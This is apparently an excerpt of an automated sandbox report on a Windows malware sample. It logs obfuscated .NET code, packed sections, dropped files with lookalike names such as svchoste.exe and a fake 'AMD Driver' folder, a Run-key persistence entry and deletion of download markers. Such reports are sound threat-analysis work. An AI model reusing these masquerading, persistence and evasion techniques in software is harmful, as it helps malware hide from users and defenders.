Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_0096231D push rcx; ret	0_2_00962330
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_00007FFC08954F91 push edx; iretd	0_2_00007FFC08954F92
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B78C65 push ecx; ret	4_2_00B78C78
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_0040E21D push ecx; ret	6_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F89E0 pushfd ; ret	6_2_021F89E1
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 7_2_00E6F020 pushad ; retf	7_2_00E6F021
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Code function: 8_2_00007FFC089D5133 pushad ; retf	8_2_00007FFC089D5149
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Code function: 8_2_00007FFC089D514B pushad ; retf	8_2_00007FFC089D5149
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Code function: 8_2_00007FFC089D7546 push ebx; retf	8_2_00007FFC089D771A
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_017EF020 pushad ; retf	12_2_017EF021
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_017EF7B0 pushad ; iretd	12_2_017EF7B1
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_05679840 push ecx; ret	12_2_05679855
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_0246F000 pushad ; retf	16_2_0246F001
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_056F9840 push ecx; ret	16_2_056F9855

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B8C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00B8C810

Source: taskshell.exe.5.dr

Static PE information: 0xC9017C47 [Wed Nov 11 10:56:07 2076 UTC]

Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: sqlite3.dll.4.dr	Static PE information: section name: /4
Source: sqlite3.dll.4.dr	Static PE information: section name: /19
Source: sqlite3.dll.4.dr	Static PE information: section name: /35
Source: sqlite3.dll.4.dr	Static PE information: section name: /51
Source: sqlite3.dll.4.dr	Static PE information: section name: /63
Source: sqlite3.dll.4.dr	Static PE information: section name: /77
Source: sqlite3.dll.4.dr	Static PE information: section name: /89
Source: sqlite3.dll.4.dr	Static PE information: section name: /102
Source: sqlite3.dll.4.dr	Static PE information: section name: /113
Source: sqlite3.dll.4.dr	Static PE information: section name: /124
Source: mozglue.dll.4.dr	Static PE information: section name: .didat
Source: AnonFileApi.dll.8.dr	Static PE information: section name: .vmp0
Source: AnonFileApi.dll.8.dr	Static PE information: section name: .vmp1

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

Source: taskshell.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0xcfc4
Source: AnonFileApi.dll.8.dr	Static PE information: real checksum: 0x0 should be: 0x585dc
Source: chormuimii.exe.0.dr	Static PE information: real checksum: 0x23bfb should be: 0xa304b
Source: svchoste.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x321ee
Source: chormuim.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x5bdcb
Source: dll.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xb0b1
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Static PE information: real checksum: 0x0 should be: 0xe3370

Source: initial sample	Static PE information: section name: .text entropy: 7.98722921393
Source: initial sample	Static PE information: section name: .text entropy: 6.83071468332
Source: initial sample	Static PE information: section name: .vmp1 entropy: 7.32418075917

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	High entropy of concatenated method names: '.cctor', 'CEx9xH2mGSxCi', 'QnrPnxm4y', 'wEh67y6u9', 'pXmS1viEp', 'ykYe3xYfd', 'LmRaF06sv', 'xM5tQsq7N', 'MUPORZUua', 'dw22U7YNS'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, Jk6HO0XViIf0S55InY/pPhX6qrvDjELNAmx4D.cs	High entropy of concatenated method names: 'JRhHee3tbj', 'YpEHanjuQk', 'TwWHt6HdBv', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X8bVuJc49U5oa8gYsr', 'xORChqDYgHQQatRtJE', 'Abfv4Ky0HZAljerF8f', 'RS8tRa6Z51vZGqJQ6F'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, AxqFycZssMun2tht7k/At4CYuk0fntcDp1Nwe.cs	High entropy of concatenated method names: 'UUeH5MhaT', 'EdcT0r0Y8', 'rj8kj87Go', 'lBXZIMo90', 'FSrdt4CYu', '.ctor', '.cctor', 'MqvvaH5DGc4SSUIgl9', 'yBtbfjVDK8EN5xWL4B', 'Y6mdxEJhTGNXyixah7'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, L75rodMXbSfZmJohfD/X4BedjcmF4CAvk4UDx.cs	High entropy of concatenated method names: 'HJS9xH22obVgp', '.ctor', '.cctor', 'fKxOdqyDiJBV9rcclV', 'jvusMLz5EhtrwhVaNg', 'Q04IBHPIls6w557absy', 'gcDwtFPPeksGSwhhUHh', 'TcoHplP10h3hpe59Mtc', 'xeylPVvLx4esmX9kK1', 'cnkDSlWV7qSUqOEIVS'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	High entropy of concatenated method names: '.cctor', 'CEx9xH2mGSxCi', 'QnrPnxm4y', 'wEh67y6u9', 'pXmS1viEp', 'ykYe3xYfd', 'LmRaF06sv', 'xM5tQsq7N', 'MUPORZUua', 'dw22U7YNS'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, AxqFycZssMun2tht7k/At4CYuk0fntcDp1Nwe.cs	High entropy of concatenated method names: 'UUeH5MhaT', 'EdcT0r0Y8', 'rj8kj87Go', 'lBXZIMo90', 'FSrdt4CYu', '.ctor', '.cctor', 'MqvvaH5DGc4SSUIgl9', 'yBtbfjVDK8EN5xWL4B', 'Y6mdxEJhTGNXyixah7'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, L75rodMXbSfZmJohfD/X4BedjcmF4CAvk4UDx.cs	High entropy of concatenated method names: 'HJS9xH22obVgp', '.ctor', '.cctor', 'fKxOdqyDiJBV9rcclV', 'jvusMLz5EhtrwhVaNg', 'Q04IBHPIls6w557absy', 'gcDwtFPPeksGSwhhUHh', 'TcoHplP10h3hpe59Mtc', 'xeylPVvLx4esmX9kK1', 'cnkDSlWV7qSUqOEIVS'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, Jk6HO0XViIf0S55InY/pPhX6qrvDjELNAmx4D.cs	High entropy of concatenated method names: 'JRhHee3tbj', 'YpEHanjuQk', 'TwWHt6HdBv', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X8bVuJc49U5oa8gYsr', 'xORChqDYgHQQatRtJE', 'Abfv4Ky0HZAljerF8f', 'RS8tRa6Z51vZGqJQ6F'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs	High entropy of concatenated method names: '.cctor', 'CEx9xH2mGSxCi', 'QnrPnxm4y', 'wEh67y6u9', 'pXmS1viEp', 'ykYe3xYfd', 'LmRaF06sv', 'xM5tQsq7N', 'MUPORZUua', 'dw22U7YNS'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, Jk6HO0XViIf0S55InY/pPhX6qrvDjELNAmx4D.cs	High entropy of concatenated method names: 'JRhHee3tbj', 'YpEHanjuQk', 'TwWHt6HdBv', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X8bVuJc49U5oa8gYsr', 'xORChqDYgHQQatRtJE', 'Abfv4Ky0HZAljerF8f', 'RS8tRa6Z51vZGqJQ6F'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, AxqFycZssMun2tht7k/At4CYuk0fntcDp1Nwe.cs	High entropy of concatenated method names: 'UUeH5MhaT', 'EdcT0r0Y8', 'rj8kj87Go', 'lBXZIMo90', 'FSrdt4CYu', '.ctor', '.cctor', 'MqvvaH5DGc4SSUIgl9', 'yBtbfjVDK8EN5xWL4B', 'Y6mdxEJhTGNXyixah7'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, L75rodMXbSfZmJohfD/X4BedjcmF4CAvk4UDx.cs	High entropy of concatenated method names: 'HJS9xH22obVgp', '.ctor', '.cctor', 'fKxOdqyDiJBV9rcclV', 'jvusMLz5EhtrwhVaNg', 'Q04IBHPIls6w557absy', 'gcDwtFPPeksGSwhhUHh', 'TcoHplP10h3hpe59Mtc', 'xeylPVvLx4esmX9kK1', 'cnkDSlWV7qSUqOEIVS'

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dll.exe	File created: C:\ProgramData\AMD Driver\taskshell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File created: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	File created: C:\Users\user\AppData\Local\Temp\dll.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	File created: C:\Users\user\AppData\Local\Temp\svchoste.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dll.exe	File created: C:\ProgramData\AMD Driver\taskshell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	File created: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	File created: C:\Users\user\AppData\Local\Temp\DotNetZip.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	File created: C:\Users\user\AppData\Local\Temp\chormuim.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\dll.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WMI Update Service			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WMI Update Service			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	File opened: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	File opened: C:\Users\user\AppData\Local\Temp\chormuimii.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B89700 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00B89700

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
